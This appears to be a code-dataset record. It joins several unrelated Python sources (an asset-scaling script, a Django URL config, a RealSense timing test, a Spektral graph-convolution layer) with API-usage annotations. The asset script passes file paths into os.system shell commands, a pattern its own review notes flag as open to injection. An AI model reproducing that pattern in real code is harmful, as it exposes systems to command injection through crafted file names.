        # waiting; confirm against the multiprocessing docs.
        pool.map_async(function, mapArguments).get(0xFFFF)
        pool.close()
    except KeyboardInterrupt:
        print(Colors.RED + "Interrupted" + Colors.ENDC)
        pool.terminate()
        sys.exit(1)
# Process files that are new to the project
def processNewAssets(newFiles):
    """Scale and compress raw assets that appeared since the last run."""
    worker_fn = partial(processRawPngAssetWithTitle, "{}: STATE > NEW")
    mapInWorkers(worker_fn, newFiles)
# Process files that were modified in the project
def processModifiedAssets(modifiedFiles):
    """Re-scale and re-compress raw assets whose content changed."""
    worker_fn = partial(processRawPngAssetWithTitle, "{}: STATE > UPDATED")
    mapInWorkers(worker_fn, modifiedFiles)
# Process files that were deleted from the project
def processDeletedAssets(deletedFiles):
    """Remove the generated variants of every raw asset that was deleted."""
    for deleted_path in deletedFiles:
        asset_name = os.path.basename(deleted_path)
        print(Colors.BLUE + asset_name + ": STATE > REMOVED" + Colors.ENDC)
        deleteAsset(asset_name)
# Prints the title, replacing the keyword for the path basename, scale and compress the asset for every screen density
def processRawPngAssetWithTitle(title, rawAssetPath):
    """Print `title` with {} replaced by the asset's basename, then process it."""
    asset_name = os.path.basename(rawAssetPath)
    print(Colors.BLUE + title.format(asset_name) + Colors.ENDC)
    processRawPngAsset(rawAssetPath)
# Scale and compress the asset for every screen density
def processRawPngAsset(rawAssetPath):
    """Generate a scaled and compressed variant of the asset per density."""
    filename = os.path.basename(rawAssetPath)
    base_name, extension = os.path.splitext(filename)  # "example.png" -> ("example", ".png")
    if targetPlatform == TARGET_ANDROID:
        # Android: same file name, one density-specific drawable folder each.
        for density in androidDensities:
            sendAssetToPngPipeline(rawAssetPath, density,
                                   dirAssets + density.path + filename)
    else:
        # iOS: a single folder, density encoded as a name suffix (e.g. @2X).
        for density in iosDensities:
            output_name = base_name + density.suffix + extension
            sendAssetToPngPipeline(rawAssetPath, density,
                                   dirAssets + output_name)
    print(filename + ": Processed the asset for every screen density")
def sendAssetToPngPipeline(rawAssetPath, density, processedAssetPath):
    """Scale the raw asset to `density`, then compress the resulting PNG."""
    asset_name = os.path.basename(rawAssetPath)
    print("%s: SCALING to %s" % (asset_name, density.name))
    scaleImage(rawAssetPath, density.scaleFactor, processedAssetPath)
    print(asset_name + ": COMPRESSING for " + density.name)
    compressPNG(processedAssetPath)
# Scale the asset for a given screen density using FFMPEG
def scaleImage(inputPath, scaleFactor, outputPath):
    """Scale the image to width*scaleFactor (height auto) using ffmpeg.

    NOTE(review): the paths are interpolated into a shell command; names
    containing double quotes or shell metacharacters would break this.
    Local, trusted file names are assumed.
    """
    os.system("ffmpeg -loglevel error -y -i \"{0}\" -vf scale=iw*{1}:-1 \"{2}\"".format(inputPath, scaleFactor, outputPath))
# Compress a PNG asset using PNGQuant
def compressPNG(inputPath):
    """Lossily compress a PNG in place with pngquant (--force overwrites it).

    NOTE(review): the path is interpolated into a shell command; trusted
    local file names are assumed.
    """
    os.system("pngquant \"{0}\" --force --ext .png".format(inputPath))
# Remove asset in every screen density
def deleteAsset(assetName):
    """Delete the generated variants of `assetName` from every density folder."""
    for density in androidDensities:
        generated_path = dirAssets + density.path + assetName
        if not os.path.exists(generated_path):
            continue
        os.remove(generated_path)
        print(assetName + ": DELETED asset for " + density.name)
# Goodbye
def goodbye():
    """Print the final success message in green."""
    print(Colors.GREEN + "WARP complete!" + Colors.ENDC)
# Main call.  NOTE(review): runs unconditionally on import; an
# `if __name__ == "__main__":` guard would be safer, kept as-is.
main()
| [
"os.path.exists",
"ntpath.basename",
"pickle.dump",
"hashlib.md5",
"argparse.ArgumentParser",
"os.makedirs",
"os.listdir",
"os.path.splitext",
"pickle.load",
"multiprocessing.cpu_count",
"shutil.rmtree",
"os.rmdir",
"functools.partial",
"multiprocessing.Pool",
"os.path.basename",
"sys.... | [((1696, 1723), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (1721, 1723), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((2480, 2552), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Seamless mobile assets management"""'}), "(description='Seamless mobile assets management')\n", (2503, 2552), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6792, 6834), 'os.path.exists', 'os.path.exists', (['(dirRaw + STORAGE_FILE_NAME)'], {}), '(dirRaw + STORAGE_FILE_NAME)\n', (6806, 6834), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((9296, 9323), 'glob.glob', 'glob.glob', (["(dirRaw + '*.png')"], {}), "(dirRaw + '*.png')\n", (9305, 9323), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((10448, 10465), 'multiprocessing.Pool', 'Pool', (['poolThreads'], {}), '(poolThreads)\n', (10452, 10465), False, 'from multiprocessing import Pool\n'), ((10781, 10836), 'functools.partial', 'partial', (['processRawPngAssetWithTitle', '"""{}: STATE > NEW"""'], {}), "(processRawPngAssetWithTitle, '{}: STATE > NEW')\n", (10788, 10836), False, 'from functools import partial\n'), ((10991, 11050), 'functools.partial', 'partial', (['processRawPngAssetWithTitle', '"""{}: STATE > UPDATED"""'], {}), "(processRawPngAssetWithTitle, '{}: STATE > UPDATED')\n", (10998, 11050), False, 'from functools import partial\n'), ((11777, 11807), 'os.path.basename', 'os.path.basename', (['rawAssetPath'], {}), '(rawAssetPath)\n', (11793, 11807), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((11835, 11861), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (11851, 11861), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((12632, 12662), 
'os.path.basename', 'os.path.basename', (['rawAssetPath'], {}), '(rawAssetPath)\n', (12648, 12662), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((5934, 5955), 'ntpath.basename', 'ntpath.basename', (['path'], {}), '(path)\n', (5949, 5955), False, 'import os, glob, hashlib, pickle, argparse, shutil, ntpath\n'), ((6579, 6604), 'os.path.exists', 'os.path.exists', (['dirAssets'], {}), '(dirAssets)\n', (6593, 6604), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6738, 6757), 'os.rmdir', 'os.rmdir', (['dirAssets'], {}), '(dirAssets)\n', (6746, 6757), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6844, 6881), 'os.remove', 'os.remove', (['(dirRaw + STORAGE_FILE_NAME)'], {}), '(dirRaw + STORAGE_FILE_NAME)\n', (6853, 6881), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7100, 7122), 'os.path.exists', 'os.path.exists', (['dirRaw'], {}), '(dirRaw)\n', (7114, 7122), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7192, 7211), 'os.makedirs', 'os.makedirs', (['dirRaw'], {}), '(dirRaw)\n', (7203, 7211), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((9342, 9355), 'hashlib.md5', 'hashlib.md5', ([], {}), '()\n', (9353, 9355), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((9792, 9854), 'pickle.dump', 'pickle.dump', (['filesToHash', 'hashStorage', 'pickle.HIGHEST_PROTOCOL'], {}), '(filesToHash, hashStorage, pickle.HIGHEST_PROTOCOL)\n', (9803, 9854), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((11242, 11264), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (11258, 11264), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((13381, 13433), 
'os.path.exists', 'os.path.exists', (['(dirAssets + density.path + assetName)'], {}), '(dirAssets + density.path + assetName)\n', (13395, 13433), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6210, 6236), 'os.path.exists', 'os.path.exists', (['densityDir'], {}), '(densityDir)\n', (6224, 6236), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6609, 6630), 'os.listdir', 'os.listdir', (['dirAssets'], {}), '(dirAssets)\n', (6619, 6630), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7626, 7651), 'os.path.exists', 'os.path.exists', (['dirAssets'], {}), '(dirAssets)\n', (7640, 7651), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7731, 7753), 'os.makedirs', 'os.makedirs', (['dirAssets'], {}), '(dirAssets)\n', (7742, 7753), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((10015, 10039), 'pickle.load', 'pickle.load', (['hashStorage'], {}), '(hashStorage)\n', (10026, 10039), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((10675, 10686), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (10683, 10686), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((13447, 13494), 'os.remove', 'os.remove', (['(dirAssets + density.path + assetName)'], {}), '(dirAssets + density.path + assetName)\n', (13456, 13494), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((3435, 3462), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (3460, 3462), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6446, 6471), 'shutil.rmtree', 'shutil.rmtree', (['densityDir'], {}), '(densityDir)\n', (6459, 6471), False, 'import os, glob, hashlib, pickle, argparse, shutil, 
multiprocessing, signal, sys\n'), ((6507, 6527), 'os.rmdir', 'os.rmdir', (['densityDir'], {}), '(densityDir)\n', (6515, 6527), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7366, 7406), 'os.path.exists', 'os.path.exists', (['(dirAssets + density.path)'], {}), '(dirAssets + density.path)\n', (7380, 7406), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((7514, 7551), 'os.makedirs', 'os.makedirs', (['(dirAssets + density.path)'], {}), '(dirAssets + density.path)\n', (7525, 7551), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((6242, 6264), 'os.listdir', 'os.listdir', (['densityDir'], {}), '(densityDir)\n', (6252, 6264), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((11583, 11613), 'os.path.basename', 'os.path.basename', (['rawAssetPath'], {}), '(rawAssetPath)\n', (11599, 11613), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n'), ((10242, 10264), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (10258, 10264), False, 'import os, glob, hashlib, pickle, argparse, shutil, multiprocessing, signal, sys\n')] |
import os
from djangular import utils
from django.test import SimpleTestCase
class SiteAndPathUtilsTest(SimpleTestCase):
    """Checks for the SiteAndPathUtils path helpers."""

    site_utils = utils.SiteAndPathUtils()

    def test_djangular_root(self):
        """get_djangular_root() must point at the parent of this test module's directory."""
        this_dir = os.path.dirname(os.path.abspath(__file__))
        expected_root = os.path.dirname(this_dir)
        self.assertEqual(expected_root, self.site_utils.get_djangular_root())
| [
"os.path.abspath",
"os.path.dirname",
"djangular.utils.SiteAndPathUtils"
] | [((142, 166), 'djangular.utils.SiteAndPathUtils', 'utils.SiteAndPathUtils', ([], {}), '()\n', (164, 166), False, 'from djangular import utils\n'), ((292, 320), 'os.path.dirname', 'os.path.dirname', (['current_dir'], {}), '(current_dir)\n', (307, 320), False, 'import os\n'), ((241, 266), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (256, 266), False, 'import os\n')] |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf.urls.static import static
from userModule.views import home
from userModule.views import userSettings
from userModule.views import logout
from groupModule.views import createGroup
from groupModule.views import group
from groupModule.views import selectgroup
from groupModule.views import groupSettings
from wee.views import *
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
import settings
# Root URLconf: maps URL regexes to view callables (pre-1.8 Django patterns() style).
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'wee.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    # Built-in Django admin site.
    url(r'^admin/', include(admin.site.urls)),
    # Core user pages.
    url(r'^home/$', home),
    url(r'^newsfeed/$', newsfeed),
    url(r'^logout/$', logout),
    url(r'^post/$', newPost),
    url(r'^newgroup/$', createGroup),
    url(r'^settings/$', userSettings),
    # Group pages; <groupId> is the group's numeric primary key.
    url(r'^group/(?P<groupId>\d+)/$', group),
    url(r'^groups/$' , selectgroup),
    url(r'^group/(?P<groupId>\d+)/settings/$', groupSettings),
    # Social graph and timeline views; <profileUserId> is a user primary key.
    url(r'^friends/$' , friends) ,
    url(r'^timeline/(?P<profileUserId>\d+)/(?P<change>\w)/friend/$', updateFriend),
    url(r'^timeline/(?P<profileUserId>\d+)/follow/$', updateFollow),
    url(r'^timeline/(?P<profileUserId>\d+)/$', timeline),
    url(r'^search/$', search),
    # Post-interaction endpoints; <postId> is a post primary key.
    url(r'^like/(?P<postId>\d+)/$', like),
    url(r'^getlike/(?P<postId>\d+)/$', getLike),
    url(r'^comment/(?P<postId>\d+)/$', comment),
    url(r'^getcomment/(?P<postId>\d+)/$', getComment),
    url(r'^share/(?P<postId>\d+)/$', share),
    url(r'^getshare/(?P<postId>\d+)/$', getShare),
)
# Serve collected static files and user-uploaded media alongside the app.
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Catch-all: any other path renders the not-found view.
urlpatterns += patterns('', url(r'^.*/$', notfound), )
| [
"django.conf.urls.static.static",
"django.conf.urls.include",
"django.contrib.staticfiles.urls.staticfiles_urlpatterns",
"django.conf.urls.url"
] | [((1632, 1657), 'django.contrib.staticfiles.urls.staticfiles_urlpatterns', 'staticfiles_urlpatterns', ([], {}), '()\n', (1655, 1657), False, 'from django.contrib.staticfiles.urls import staticfiles_urlpatterns\n'), ((1673, 1734), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n', (1679, 1734), False, 'from django.conf.urls.static import static\n'), ((702, 722), 'django.conf.urls.url', 'url', (['"""^home/$"""', 'home'], {}), "('^home/$', home)\n", (705, 722), False, 'from django.conf.urls import patterns, include, url\n'), ((729, 757), 'django.conf.urls.url', 'url', (['"""^newsfeed/$"""', 'newsfeed'], {}), "('^newsfeed/$', newsfeed)\n", (732, 757), False, 'from django.conf.urls import patterns, include, url\n'), ((764, 788), 'django.conf.urls.url', 'url', (['"""^logout/$"""', 'logout'], {}), "('^logout/$', logout)\n", (767, 788), False, 'from django.conf.urls import patterns, include, url\n'), ((795, 818), 'django.conf.urls.url', 'url', (['"""^post/$"""', 'newPost'], {}), "('^post/$', newPost)\n", (798, 818), False, 'from django.conf.urls import patterns, include, url\n'), ((825, 856), 'django.conf.urls.url', 'url', (['"""^newgroup/$"""', 'createGroup'], {}), "('^newgroup/$', createGroup)\n", (828, 856), False, 'from django.conf.urls import patterns, include, url\n'), ((863, 895), 'django.conf.urls.url', 'url', (['"""^settings/$"""', 'userSettings'], {}), "('^settings/$', userSettings)\n", (866, 895), False, 'from django.conf.urls import patterns, include, url\n'), ((902, 942), 'django.conf.urls.url', 'url', (['"""^group/(?P<groupId>\\\\d+)/$"""', 'group'], {}), "('^group/(?P<groupId>\\\\d+)/$', group)\n", (905, 942), False, 'from django.conf.urls import patterns, include, url\n'), ((948, 977), 'django.conf.urls.url', 'url', (['"""^groups/$"""', 'selectgroup'], {}), "('^groups/$', selectgroup)\n", (951, 977), False, 'from django.conf.urls 
import patterns, include, url\n'), ((985, 1042), 'django.conf.urls.url', 'url', (['"""^group/(?P<groupId>\\\\d+)/settings/$"""', 'groupSettings'], {}), "('^group/(?P<groupId>\\\\d+)/settings/$', groupSettings)\n", (988, 1042), False, 'from django.conf.urls import patterns, include, url\n'), ((1048, 1074), 'django.conf.urls.url', 'url', (['"""^friends/$"""', 'friends'], {}), "('^friends/$', friends)\n", (1051, 1074), False, 'from django.conf.urls import patterns, include, url\n'), ((1083, 1162), 'django.conf.urls.url', 'url', (['"""^timeline/(?P<profileUserId>\\\\d+)/(?P<change>\\\\w)/friend/$"""', 'updateFriend'], {}), "('^timeline/(?P<profileUserId>\\\\d+)/(?P<change>\\\\w)/friend/$', updateFriend)\n", (1086, 1162), False, 'from django.conf.urls import patterns, include, url\n'), ((1167, 1230), 'django.conf.urls.url', 'url', (['"""^timeline/(?P<profileUserId>\\\\d+)/follow/$"""', 'updateFollow'], {}), "('^timeline/(?P<profileUserId>\\\\d+)/follow/$', updateFollow)\n", (1170, 1230), False, 'from django.conf.urls import patterns, include, url\n'), ((1236, 1288), 'django.conf.urls.url', 'url', (['"""^timeline/(?P<profileUserId>\\\\d+)/$"""', 'timeline'], {}), "('^timeline/(?P<profileUserId>\\\\d+)/$', timeline)\n", (1239, 1288), False, 'from django.conf.urls import patterns, include, url\n'), ((1294, 1318), 'django.conf.urls.url', 'url', (['"""^search/$"""', 'search'], {}), "('^search/$', search)\n", (1297, 1318), False, 'from django.conf.urls import patterns, include, url\n'), ((1325, 1362), 'django.conf.urls.url', 'url', (['"""^like/(?P<postId>\\\\d+)/$"""', 'like'], {}), "('^like/(?P<postId>\\\\d+)/$', like)\n", (1328, 1362), False, 'from django.conf.urls import patterns, include, url\n'), ((1368, 1411), 'django.conf.urls.url', 'url', (['"""^getlike/(?P<postId>\\\\d+)/$"""', 'getLike'], {}), "('^getlike/(?P<postId>\\\\d+)/$', getLike)\n", (1371, 1411), False, 'from django.conf.urls import patterns, include, url\n'), ((1417, 1460), 'django.conf.urls.url', 'url', 
(['"""^comment/(?P<postId>\\\\d+)/$"""', 'comment'], {}), "('^comment/(?P<postId>\\\\d+)/$', comment)\n", (1420, 1460), False, 'from django.conf.urls import patterns, include, url\n'), ((1466, 1515), 'django.conf.urls.url', 'url', (['"""^getcomment/(?P<postId>\\\\d+)/$"""', 'getComment'], {}), "('^getcomment/(?P<postId>\\\\d+)/$', getComment)\n", (1469, 1515), False, 'from django.conf.urls import patterns, include, url\n'), ((1521, 1560), 'django.conf.urls.url', 'url', (['"""^share/(?P<postId>\\\\d+)/$"""', 'share'], {}), "('^share/(?P<postId>\\\\d+)/$', share)\n", (1524, 1560), False, 'from django.conf.urls import patterns, include, url\n'), ((1566, 1611), 'django.conf.urls.url', 'url', (['"""^getshare/(?P<postId>\\\\d+)/$"""', 'getShare'], {}), "('^getshare/(?P<postId>\\\\d+)/$', getShare)\n", (1569, 1611), False, 'from django.conf.urls import patterns, include, url\n'), ((1763, 1785), 'django.conf.urls.url', 'url', (['"""^.*/$"""', 'notfound'], {}), "('^.*/$', notfound)\n", (1766, 1785), False, 'from django.conf.urls import patterns, include, url\n'), ((671, 695), 'django.conf.urls.include', 'include', (['admin.site.urls'], {}), '(admin.site.urls)\n', (678, 695), False, 'from django.conf.urls import patterns, include, url\n')] |
# License: Apache 2.0. See LICENSE file in root directory.
# Copyright(c) 2021 Intel Corporation. All Rights Reserved.
# test:device L500*
# test:device D400*
import pyrealsense2 as rs
from rspy.stopwatch import Stopwatch
from rspy import test, log
import time
import platform
# Start depth + color streams and measure the time from stream opened until first frame arrived using sensor API.
# Verify that the time do not exceeds the maximum time allowed
# Note - Using Windows Media Foundation to handle power management between USB actions take time (~27 ms)
def time_to_first_frame(sensor, profile, max_delay_allowed):
    """
    Open 'profile' on 'sensor' and measure how long the first frame takes
    to arrive, waiting up to 'max_delay_allowed' + 1 extra second.

    Returns the elapsed seconds since open() if a frame arrived in time,
    otherwise returns 'max_delay_allowed'.
    """
    elapsed_to_first = max_delay_allowed
    open_call_stopwatch = Stopwatch()

    def frame_cb(frame):
        # Record only the very first frame's arrival time.
        nonlocal elapsed_to_first, open_call_stopwatch
        if elapsed_to_first == max_delay_allowed:
            elapsed_to_first = open_call_stopwatch.get_elapsed()

    open_call_stopwatch.reset()
    sensor.open(profile)
    sensor.start(frame_cb)

    # Poll until a frame arrived or the extended deadline passed.
    deadline = max_delay_allowed + 1
    while elapsed_to_first == max_delay_allowed and open_call_stopwatch.get_elapsed() < deadline:
        time.sleep(0.05)

    sensor.stop()
    sensor.close()
    return elapsed_to_first
# The device starts at D0 (Operational) state, allow time for it to get into idle state
time.sleep(3)
#####################################################################################################
# Section 1: constructing the device object must complete within the budget.
test.start("Testing device creation time on " + platform.system() + " OS")
device_creation_stopwatch = Stopwatch()
dev = test.find_first_device_or_exit()
device_creation_time = device_creation_stopwatch.get_elapsed()
# Budget for device creation, in seconds.
max_time_for_device_creation = 1.5
print("Device creation time is: {:.3f} [sec] max allowed is: {:.1f} [sec] ".format(device_creation_time, max_time_for_device_creation))
test.check(device_creation_time < max_time_for_device_creation)
test.finish()
# Set maximum delay for first frame according to product line
product_line = dev.get_info(rs.camera_info.product_line)
if product_line == "D400":
    max_delay_for_depth_frame = 1.5
    max_delay_for_color_frame = 1.5
elif product_line == "L500":
    max_delay_for_depth_frame = 2.5 # L515 depth frame has a 1.5 seconds built in delay at the FW side + 1.0 second for LRS
    max_delay_for_color_frame = 1.5
else:
    # Unsupported hardware: fail the whole run.
    log.f( "This test support only D400 + L515 devices" )
# Select 30 fps depth (z16) and color (rgb8) profiles to time below.
ds = dev.first_depth_sensor()
cs = dev.first_color_sensor()
dp = next(p for p in
          ds.profiles if p.fps() == 30
          and p.stream_type() == rs.stream.depth
          and p.format() == rs.format.z16)
cp = next(p for p in
          cs.profiles if p.fps() == 30
          and p.stream_type() == rs.stream.color
          and p.format() == rs.format.rgb8)
#####################################################################################################
# Section 2: the first depth frame must arrive within the product-line budget.
test.start("Testing first depth frame delay on " + product_line + " device - "+ platform.system() + " OS")
first_depth_frame_delay = time_to_first_frame(ds, dp, max_delay_for_depth_frame)
print("Time until first depth frame is: {:.3f} [sec] max allowed is: {:.1f} [sec] ".format(first_depth_frame_delay, max_delay_for_depth_frame))
test.check(first_depth_frame_delay < max_delay_for_depth_frame)
test.finish()
#####################################################################################################
# Section 3: the first color frame must arrive within the product-line budget.
test.start("Testing first color frame delay on " + product_line + " device - "+ platform.system() + " OS")
first_color_frame_delay = time_to_first_frame(cs, cp, max_delay_for_color_frame)
print("Time until first color frame is: {:.3f} [sec] max allowed is: {:.1f} [sec] ".format(first_color_frame_delay, max_delay_for_color_frame))
test.check(first_color_frame_delay < max_delay_for_color_frame)
test.finish()
#####################################################################################################
test.print_results_and_exit()
| [
"rspy.test.finish",
"rspy.log.f",
"rspy.stopwatch.Stopwatch",
"rspy.test.check",
"rspy.test.print_results_and_exit",
"time.sleep",
"platform.system",
"rspy.test.find_first_device_or_exit"
] | [((1623, 1636), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (1633, 1636), False, 'import time\n'), ((1844, 1855), 'rspy.stopwatch.Stopwatch', 'Stopwatch', ([], {}), '()\n', (1853, 1855), False, 'from rspy.stopwatch import Stopwatch\n'), ((1862, 1894), 'rspy.test.find_first_device_or_exit', 'test.find_first_device_or_exit', ([], {}), '()\n', (1892, 1894), False, 'from rspy import test, log\n'), ((2129, 2192), 'rspy.test.check', 'test.check', (['(device_creation_time < max_time_for_device_creation)'], {}), '(device_creation_time < max_time_for_device_creation)\n', (2139, 2192), False, 'from rspy import test, log\n'), ((2193, 2206), 'rspy.test.finish', 'test.finish', ([], {}), '()\n', (2204, 2206), False, 'from rspy import test, log\n'), ((3489, 3552), 'rspy.test.check', 'test.check', (['(first_depth_frame_delay < max_delay_for_depth_frame)'], {}), '(first_depth_frame_delay < max_delay_for_depth_frame)\n', (3499, 3552), False, 'from rspy import test, log\n'), ((3553, 3566), 'rspy.test.finish', 'test.finish', ([], {}), '()\n', (3564, 3566), False, 'from rspy import test, log\n'), ((4003, 4066), 'rspy.test.check', 'test.check', (['(first_color_frame_delay < max_delay_for_color_frame)'], {}), '(first_color_frame_delay < max_delay_for_color_frame)\n', (4013, 4066), False, 'from rspy import test, log\n'), ((4067, 4080), 'rspy.test.finish', 'test.finish', ([], {}), '()\n', (4078, 4080), False, 'from rspy import test, log\n'), ((4185, 4214), 'rspy.test.print_results_and_exit', 'test.print_results_and_exit', ([], {}), '()\n', (4212, 4214), False, 'from rspy import test, log\n'), ((908, 919), 'rspy.stopwatch.Stopwatch', 'Stopwatch', ([], {}), '()\n', (917, 919), False, 'from rspy.stopwatch import Stopwatch\n'), ((1449, 1465), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (1459, 1465), False, 'import time\n'), ((2626, 2677), 'rspy.log.f', 'log.f', (['"""This test support only D400 + L515 devices"""'], {}), "('This test support only D400 + L515 
devices')\n", (2631, 2677), False, 'from rspy import test, log\n'), ((1789, 1806), 'platform.system', 'platform.system', ([], {}), '()\n', (1804, 1806), False, 'import platform\n'), ((3237, 3254), 'platform.system', 'platform.system', ([], {}), '()\n', (3252, 3254), False, 'import platform\n'), ((3751, 3768), 'platform.system', 'platform.system', ([], {}), '()\n', (3766, 3768), False, 'import platform\n')] |
from tensorflow.keras import activations, initializers, regularizers, constraints
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Layer
from spektral.layers import ops
from spektral.utils import localpooling_filter
class GraphConv(Layer):
    r"""
    A graph convolutional layer (GCN) as presented by
    [<NAME> (2016)](https://arxiv.org/abs/1609.02907).
    **Mode**: single, disjoint, mixed, batch.
    This layer computes:
    $$
        \Z = \hat \D^{-1/2} \hat \A \hat \D^{-1/2} \X \W + \b
    $$
    where \( \hat \A = \A + \I \) is the adjacency matrix with added self-loops
    and \(\hat\D\) is its degree matrix.
    **Input**
    - Node features of shape `([batch], N, F)`;
    - Modified Laplacian of shape `([batch], N, N)`; can be computed with
    `spektral.utils.convolution.localpooling_filter`.
    **Output**
    - Node features with the same shape as the input, but with the last
    dimension changed to `channels`.
    **Arguments**
    - `channels`: number of output channels;
    - `activation`: activation function to use;
    - `use_bias`: bool, add a bias vector to the output;
    - `kernel_initializer`: initializer for the weights;
    - `bias_initializer`: initializer for the bias vector;
    - `kernel_regularizer`: regularization applied to the weights;
    - `bias_regularizer`: regularization applied to the bias vector;
    - `activity_regularizer`: regularization applied to the output;
    - `bias_constraint`: constraint applied to the bias vector;
    - `kernel_constraint`: constraint applied to the weights.
    """
    def __init__(self,
                 channels,
                 activation=None,
                 use_bias=True,
                 kernel_initializer='glorot_uniform',
                 bias_initializer='zeros',
                 kernel_regularizer=None,
                 bias_regularizer=None,
                 activity_regularizer=None,
                 kernel_constraint=None,
                 bias_constraint=None,
                 **kwargs):
        super().__init__(activity_regularizer=activity_regularizer, **kwargs)
        self.channels = channels
        # Keras get()/serialize() helpers resolve string identifiers
        # (e.g. 'relu', 'glorot_uniform') and pass real objects through.
        self.activation = activations.get(activation)
        self.use_bias = use_bias
        self.kernel_initializer = initializers.get(kernel_initializer)
        self.bias_initializer = initializers.get(bias_initializer)
        self.kernel_regularizer = regularizers.get(kernel_regularizer)
        self.bias_regularizer = regularizers.get(bias_regularizer)
        self.kernel_constraint = constraints.get(kernel_constraint)
        self.bias_constraint = constraints.get(bias_constraint)
        self.supports_masking = False
    def build(self, input_shape):
        # input_shape is [features_shape, filter_shape]; the kernel maps the
        # node feature dimension F to `channels`.
        assert len(input_shape) >= 2
        input_dim = input_shape[0][-1]
        self.kernel = self.add_weight(shape=(input_dim, self.channels),
                                      initializer=self.kernel_initializer,
                                      name='kernel',
                                      regularizer=self.kernel_regularizer,
                                      constraint=self.kernel_constraint)
        if self.use_bias:
            self.bias = self.add_weight(shape=(self.channels,),
                                        initializer=self.bias_initializer,
                                        name='bias',
                                        regularizer=self.bias_regularizer,
                                        constraint=self.bias_constraint)
        else:
            self.bias = None
        self.built = True
    def call(self, inputs):
        features = inputs[0]
        fltr = inputs[1]
        # Convolution: X W, then propagate along the graph filter.
        output = ops.dot(features, self.kernel)
        output = ops.filter_dot(fltr, output)
        if self.use_bias:
            output = K.bias_add(output, self.bias)
        if self.activation is not None:
            output = self.activation(output)
        return output
    def compute_output_shape(self, input_shape):
        # Same shape as the node features, with F replaced by `channels`.
        features_shape = input_shape[0]
        output_shape = features_shape[:-1] + (self.channels,)
        return output_shape
    def get_config(self):
        # Serialize every constructor argument so the layer round-trips
        # through Keras model (de)serialization.
        config = {
            'channels': self.channels,
            'activation': activations.serialize(self.activation),
            'use_bias': self.use_bias,
            'kernel_initializer': initializers.serialize(self.kernel_initializer),
            'bias_initializer': initializers.serialize(self.bias_initializer),
            'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
            'bias_regularizer': regularizers.serialize(self.bias_regularizer),
            'kernel_constraint': constraints.serialize(self.kernel_constraint),
            'bias_constraint': constraints.serialize(self.bias_constraint)
        }
        base_config = super().get_config()
        return dict(list(base_config.items()) + list(config.items()))
    @staticmethod
    def preprocess(A):
        # Build the normalized filter \hat D^{-1/2} \hat A \hat D^{-1/2}
        # from a raw adjacency matrix.
        return localpooling_filter(A)
"tensorflow.keras.constraints.get",
"tensorflow.keras.regularizers.serialize",
"tensorflow.keras.activations.get",
"spektral.layers.ops.filter_dot",
"tensorflow.keras.initializers.serialize",
"tensorflow.keras.backend.bias_add",
"spektral.utils.localpooling_filter",
"spektral.layers.ops.dot",
